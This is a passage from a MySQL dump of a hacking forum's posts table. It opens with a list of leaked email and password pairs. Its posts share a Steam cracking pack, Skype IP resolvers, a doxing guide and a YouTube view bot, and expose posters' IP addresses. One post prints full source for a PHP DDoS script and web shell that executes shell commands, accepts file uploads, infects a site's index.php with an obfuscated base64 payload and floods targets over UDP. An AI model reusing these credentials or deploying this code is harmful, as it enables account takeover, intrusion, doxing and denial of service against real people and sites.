Pass: Wharton User : stracc13@yahoo.ca Pass : biggbigg User : fgarzalaredo@aol.com Pass : bravo820 User : jpark1055@comcast.net Pass : nomar103 user: jervis pass: jervis user: jeanette pass: jeanette user: jacqui pass: jacqui user: jamin pass: jamin User : jaman Pass : jaman User: Chris@Chriskphoto.com Pass: melinda User: bestj77@yahoo.com Pass: jasonbest04 User: archer.girl@Verizon.net Pass: dragqueen User: chefmadrid@hotmail.com Pass: eros69 User: tv2866@hotmail.com Pass: pickle User: trumoondogg@hotmail.com Pass: ybnozdd User: voodoo940@hotmail.com Pass: wacked29 User: tyjaco@hotmail.com Pass: oublier User: venomslayer@hotmail.com Pass: badass User: yncdrummer@hotmail.com Pass: wagie88 User: wallulis@hotmail.com Pass: homey1 User: homayoun Pass: homayoun User: hirsch Pass: hirsch User: nissa Pass: nissa User: nelson Pass: nelson User: janine Pass: janine User: eddie22 Pass: eddie22 Ueer: moansjones Pass: daddy71 User: ytrewq Pass: qwerty User: friendlycow@gmail.com Pass: homers User: lauretta Pass: lauretta[/code]', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'dd07c9022f426d7e63343d8a8a5a6ecc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4257', '749', '4255', '4', 'RE: It\'s BreShiE!', '0', '62', 'R?????zo?', '1349971028', '[quote=\'BreShiE\' pid=\'4255\' dateline=\'1349970207\'] [quote=\'R?????zo?\' pid=\'4254\' dateline=\'1349969901\'] [quote=\'BreShiE\' pid=\'4252\' dateline=\'1349968435\'] Thanks Reloadzor. Like your name btw, lol. [/quote] may I ask you why is that? :P [/quote] I\'m not actually sure, I just do for some reason. :D [/quote] haha thanks I guess :P I used to be just reload, but when I joined the blackhat world I put the \'zor\' for some reason :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'bb91e9cd3d4f4b32fde2f801828f7f84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4258', '809', '0', '64', 'LIVE STREAM BASKETBALL / SOCCER/MMA/WWE/FOOTBALL/ESPN', '0', '62', 'R?????zo?', '1349971115', 'Here\'s something really cool I would like to share with you guys. They stream live wwe/ufc/basketball/soccer http://thefirstrow.eu/', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '4a64d7349caa2d373ca557ad6ad1d8d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4259', '810', '0', '64', 'Good website\'s for Movie\'s to Watch', '0', '62', 'R?????zo?', '1349971244', 'Hi everyone, I found a few good website\'s for you all. http://www.1channel.ch/ http://noobroom.com/ http://www.solarmovie.eu/ http://www.openculture.com/freemoviesonline http://popcornflix.com/ http://www.free-tv-video-online.me/ http://www.free-tv-video-online.me/movies/ http://www.indiemoviesonline.com/free-movies http://www.alluc.org/ http://www.streamallyoucan.com/ http://www.tv-links.eu/ http://motionempire.com http://www.watchingitnow.com/ http://movie25.com/ http://johnlocker.com/ http://videoplace.eu/ Credits: kingzofmc', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '00bbef4ddda559a7e02377d15b5ad8ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4260', '811', '0', '17', '100+ Pictures of Same Brunette | E-Whore Pack', '0', '62', 'R?????zo?', '1349971538', 'Heres the link: http://www.mediafire.com/?bz79v7p7g299ex8 Enjoy :)', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '64450c87e61cf733d25a86d2eaa3bcce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4261', '812', '0', '61', 'Skype resolvers [WEB BASED]', '0', '62', 'R?????zo?', '1349971694', 'Here are a bunch of sites where you can use Skype IP Resolvers. [lock] http://www.asylumbooter.us/booter/register.php (register then just login and use skype ip resolver) http://godlyresolver.netne.net/ http://www.engagetutorials.co.cc/skype.php http://67.23.226.149/~silentcr/ http://www.anonware.net/resolver.php http://atomicapi.net/skype.php?name= (That\'s an API :P) http://zaldronsdeadlys.comlu.com/ http://team-enigma.net/resolve.php http://skypegrab.vacau.com [/lock]', '46.50.38.84', '775038548', '1', '0', '62', '1352550936', '1', '303416be3df55943af88df836925d70b', '0', '1352550936'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4262', '813', '0', '61', 'Ultimate Steam Cracking Pack', '0', '62', 'R?????zo?', '1349972205', 'Pack Comes With: - Bruteforcer - Steam Username Leecher + Wordlist - 4 Password Lists (From 50 Passwords To 4,000,000 Passwords) - Proxies (You Should Take New One Because Most Of These Are Outdated) Download link: http://www.mediafire.com/?28djl9yz692cyod NOTE: run on a sandboxie, I\'ve not scanned if this is clean or not. Use at your own risk, but should be clean.', '46.50.38.84', '775038548', '1', '0', '62', '1349972243', '1', '85135f1751b469145684f8b0b732bbba', '0', '1349972243'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4263', '814', '0', '14', 'How to Get a Free VPN (Lifetime)', '0', '62', 'R?????zo?', '1349972400', '1. Go to http://vpntracker.com/us/index.html 2. Register 30 days trial with your email. 3. This VPN lasts for 30-40 days 4. Then you can see resend activation mail under profile and click on that and you will get another 30 days trial by confirming that mail.... 5. Repeat 4th step continuously once a month and you will get lifetime VPN', '46.50.38.84', '775038548', '1', '0', '62', '1349973531', '1', 'fa8a4caaea3ac54270a318c309f2b8b6', '0', '1349973531'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4264', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349973371', 'Yeah, you find that a lot haha. Reloadzor teH Hax0r.', '78.149.62.28', '1318403612', '1', '0', '0', '0', '1', 'b78ed51cc742249e2b1f857f9d4598c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4265', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '100', '??zg???g????61', '1349975765', 'Welcome buddy :) have a nice stay.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'a0367e2acc21514da4d49804ba518d91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4266', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '252', 'k3h3d5', '1349983084', 'Nice Tutorial Thanks Information ...', '110.137.72.228', '1854490852', '0', '0', '0', '0', '1', '1ae4969b15d8b2e1fe320d98fd0f5beb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4267', '815', '0', '73', 'your favourite iOS games', '0', '62', 'R?????zo?', '1349983096', 'what are you favourite games ?', '94.132.244.168', '1585771688', '1', '0', '62', '1349983123', '1', '57d8e529207c5af53d0286106066a98b', '0', '1349983123'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4268', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1349984045', 'Still though. It\'s looking nice. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b0c0177c2b4797dc55354318c0647596', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4269', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1349984079', 'Might come back to the forum. Maybe.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '705aefdfc523415871a11ad76fed7101', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4270', '782', '4052', '7', 'RE: We need to advertise!', '0', '82', 'iTzIpod', '1349984135', 'We\'re still banned? Really? -.- No wonder he\'s so pissed off at me then.', '24.212.197.164', '416597412', '1', '0', '1', '1350003261', '1', 'af8d3d1b3feb8f857bfb904e8b3f60b1', '0', '1350003261'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4271', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349984174', 'http://l33thacking.net/thread-190-page-8.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5cd1cae828f15e0f49157a49799a2583', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4272', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349984207', '55. /me is le shit .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0403875ae0060a0024c9c59c47fe98fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4273', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '82', 'iTzIpod', '1349984305', 'I know. That\'s what I said. We can\'t go back for him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6753c8b5557a910a87aee75422e127b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4274', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349984337', 'No. That\'s just racist... -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '34d06a8c63a72845f119c19cd7bbdd91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4275', '418', '4269', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '62', 'R?????zo?', '1349985836', '[quote=\'iTzIpod\' pid=\'4269\' dateline=\'1349984079\'] Might come back to the forum. Maybe. [/quote] you need to! I already miss you :(', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11f5e9ba8177a13e204f790e8228e0a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4276', '816', '0', '9', '| Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '17', '228', 'VirtualLegend', '1349990491', '[align=center][size=medium][color=#32CD32]Hello l33thacking Members, here is a small list of traffic exchange sites. All links without refferal.[/color] [color=#FFD700][size=medium]My favorite is Hitleap !!![/size][/color] [color=#98FB98]EasyHit4U Empireviews HitLeap RoboViews YouLikeHits EnhanceViews 247TrafficPro WebSyndic Vagex u2bviews ShareYoutubeVideos AddMeFast StartXchange TrafficG TrafficSplash 10kHits MarketingSurf eBesucher Oxosurf SmileyTraffic SocialMediaExplode uWantFans[/color] [color=#FFD700][size=medium]Google Them :P [/size][/color] [color=#32CD32]If you know more sites post it below and I will add them .[/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '228', '1349990568', '1', '205e25576aff47b48d5a2511da4c0d55', '0', '1349990568'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4285', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '1', 't3h jok3r', '1350003389', 'True and a person like him who has been banned on almost every forum he is on because of his attitude and false accusations so he was going to be banned someday on LH due to his attitude. If he was nice to members then I would\'ve still let him stay here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a168a902c6f4f136643b3248185daa51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4286', '817', '4281', '7', 'RE: Favorite Quote?', '0', '1', 't3h jok3r', '1350003795', 'It\'s better to be hated than loved. Not my most favorite but one of quotes I like.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'da00ae89d366c591a47cb30781a39178', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4287', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1350003897', 'I updated the forum icon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'febe4ad5bd22bad242ba83d5db7e2f43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4288', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1350003907', 'http://l33thacking.net/thread-811.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '59254d9837f63ffead921da9b221da97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4289', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1350003929', '56. http://l33thacking.net/thread-811.html 811 thread, so awesome.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fa9860ea4421005e514f002d42719123', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4290', '772', '3947', '58', 'RE: Group Request', '0', '7', 'Romdu62', '1350004591', 'Why didn\'t any staff member comment here?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '248d7ac2cfb6231d94d210573061622e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4291', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '7', 'Romdu62', '1350004672', 'When is the fearless group recruiting?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '61baadebc2f69f8c618823625f189222', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4292', '819', '0', '68', 'PHP DDoS Script', '0', '7', 'Romdu62', '1350005038', '[code] <?php error_reporting(0); $base = dirname(__FILE__).\"/\"; function stoped() {cmdexec(\"killall -9 perl; killall -9 perl-bin; killall -9 perl-cgi; \"); unlink($base.\"start.php\"); unlink($base.\"f1.pl\"); unlink($base.\"run.pl\"); unlink($base.\"startphp.php\"); print \"<stopcleandos>Stop & Clean</stopcleandos>\"; apache_child_terminate(); }function UploadFile($File){cmdexec(\"killall -9 perl\"); cmdexec(\"killall -9 perl-bin\"); cmdexec(\"killall -9 perl-cgi\"); $target_path =\"./\"; $target_path = $target_path . basename( $File[\'name\']); @move_uploaded_file($File[\'tmp_name\'], $target_path); }function cmdexec($cmd){if(function_exists(\'system\'))@system($cmd); elseif(function_exists(\'passthru\'))@passthru($cmd); elseif(function_exists(\'shell_exec\'))@shell_exec($cmd); elseif(function_exists(\'exec\'))@exec($cmd); elseif(function_exists(\'popen\'))@popen($cmd,\"r\"); }function curPageURL(){$pageURL = \'http\'; if ($_SERVER[\"HTTPS\"] == \"on\") {$pageURL .= \"s\"; }$pageURL .= \"://\"; if ($_SERVER[\"SERVER_PORT\"] != \"80\") {$pageURL .= $_SERVER[\"SERVER_NAME\"].\":\".$_SERVER[\"SERVER_PORT\"].$_SERVER[\"REQUEST_URI\"]; } else {$pageURL .= $_SERVER[\"SERVER_NAME\"].$_SERVER[\"REQUEST_URI\"]; }return $pageURL; }function DNullRequest() {@ob_start(); print \"<!DOCTYPE HTML PUBLIC\\\"-//IETF//DTDHTML 2.0//EN\\\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /indx.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>\"; die(); }if ($_GET[\'action\']==\"status\") {print \"itsoknoproblembro\"; exit(); }if ($_GET[\'action\']==\"start.php\") {cmdexec(\"ps | grep -r perl\"); exit(); }if ($_GET[\'action\']==\"startphp.php\") {cmdexec(\"ps | grep -r php\"); exit(); }if ($_GET[\'action\']==\"infection\") {$up = \"<?php eval(gzinflate(base64_decode(\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V?c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM?9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1?aTi2mGSmT8L/Lj7mfJwd/8B\'))); ?>\"; $index =$_SERVER[\'DOCUMENT_ROOT\'].\"/index.php\"; if (file_exists($index)) {$fp = @fopen($index, \'a+\'); @fwrite($fp, $up); @fclose($fp); $content = file_get_contents($index); if (eregi(\"RSqMi6uu\",$content)) {print \"<infectdos>Infected</infectdos>\"; }else{print \"<infectdos>Not Infected</infectdos>\"; }}else{print \"<infectdos>N E I</infectdos>\";}}switch($_POST[\'action\']){case \"upload\":UploadFile($_FILES[\'file\']); break; case \"stop\":stoped(); break; case \"ust\":$page = curPageURL(); $ip = $_POST[\'ip\']; $port = \"11\"; $out = $page.\"\\n\"; $socket = stream_socket_client(\"udp://$ip:$port\"); if ($socket) {stream_set_write_buffer($socket, 0); stream_socket_sendto($socket,$out); }fclose($socket); break; case \"ab\":$url = $_POST[\'url\']; $c = $_POST[\'c\']; $n = $_POST[\'n\']; cmdexec(\"ab -c $c -n $n $url\"); break; default:DNullRequest(); break; }?> [/code] Not sure if it still works because I had this saved in my notepad.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8f0e2568f16afb8c3639e9733732b6a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4278', '782', '4052', '7', 'RE: We need to advertise!', '0', '222', 'Exposé', '1349991272', 'Well as I said above we need to just make threads on other forums...', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', 'fc65229430fefc4c64c7126953524e1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4279', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '2', 'Apathy', '1349991453', 'Thanks for the share mate. :$ I may try this.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '30e030d23938b62c3f9c83ab79f866fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4280', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1349992297', 'I\'ll be on Skype every now and then.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'edb8006ee1b0f5d55162e816d18f6dbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4281', '817', '0', '7', 'Favorite Quote?', '0', '82', 'iTzIpod', '1349992473', 'What\'s your favorite quote? Mine is Trust is like an eraser; It gets smaller and smaller after every mistake. I heard this on Twitter a couple days ago. :p Will update or post a new quote everyday or so maybe. I don\'t know. I\'ll try. What\'s your favorite quote? Post below.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ac16cb18a66d2159601f1f9b9f0d4f0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4282', '817', '4281', '7', 'RE: Favorite Quote?', '0', '62', 'R?????zo?', '1349992778', '\"some people walk in the rain, others just get wet\" No idea, just catch my eye.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '98c6438b9c7325dfb42c6f7bfc0cbc03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4283', '818', '0', '61', 'Leak Ultimate In-Depth Doxing Tutorial', '0', '62', 'R?????zo?', '1349993473', 'Have fun guys. Download link: http://wormszone.net/downloads/Ultimate%20In-Depth%20Doxing%20Tutorial.pdf', '94.132.244.168', '1585771688', '1', '0', '62', '1349993481', '1', 'a142eec58b1caf43efd6108e544ca30c', '0', '1349993481'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4293', '820', '0', '18', '[FREE]Youtube Bot - View increaser + 4,000 proxy list', '0', '7', 'Romdu62', '1350005599', 'Before download links here are virus scans Virus total [color=#FF0000]12/42[/color] [spoiler]https://www.virustotal.com/file/483fa11c3ef5ef8ffe181827c9b8b1d99e45d3563920363b4e2c773adecb743f/analysis/1346618438/ [/spoiler] jotti [color=#FF0000]4/20[/color] [spoiler] http://virusscan.jotti.org/en/scanresult/0eefd2f8c8bb10c573488878b2d2623bb782a1f3/daeab53fca2ea92001894f3f3522da9ac7b47182 [/spoiler] It looks suspicious and i am new around here .. My [color=#FFD700]advice[/color] would be to run it in sand box or virtual machine unless you know what are these reports or know how to analyze changes(and other stuffs) on your pc ... This is the original screen shot i ve made long time ago and some of you probably saw it on other forum(won\'t mention which one) .. [align=center][img]http://t3.gstatic.com/images?q=tbn:ANd9GcRJ0B9QQHz4NIhgqhEakSC5qHbWNHVzeOCEfext_UrV1QMNXfRBfw&t=1[/img][/align] [align=center] Here are download links : [url=http://adf.ly/T4F4][color=#FFD700]Youtube Bot[/color][/url] [url=http://adf.ly/CVCew][color=#FF0000]Proxy List 4,000+(Sep 02 2012)[/color] [/url][/align] [align=center][size=x-large][color=#32CD32]Keep reading:[/color][/size] [/align] At ~250 views youtube usually lock/freeze view count. However that is bypassed after 4-6 hours of constant visits(bot running,i run 3-4 instances of the bot at once usually). It is interesting that many claimed it is not working,however i have increased views of one of my videos (have 2 videos on channel) to 1600+, just as test,and in few days the rate jumped to 2,9k+ and i got 3 new subs on channel. If you are interested for live preview of the video PM me. Here is SS of the video : [align=center][img]http://www.dodaj.rs/f/2s/Ni/25guNCAx/untitled.png[/img][/align]', '72.231.24.165', '1223104677', '0', '0', '7', '1350005666', '1', 'e0f98fa031fb408e23b1f3448befc0ad', '0', '1350005666'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4294', '821', '0', '28', 'What\'s on your mind or what are your future plans?', '0', '5', 'Timmy', '1350006694', 'What\'s going on in your mind or what have you been thinking of recently but not sure if you want to do it or not. Me: Thinking if I should ask this girl out on a date or not but she is short but she got good boobs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '71d1e94182de10aa77df23cc1033d062', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4295', 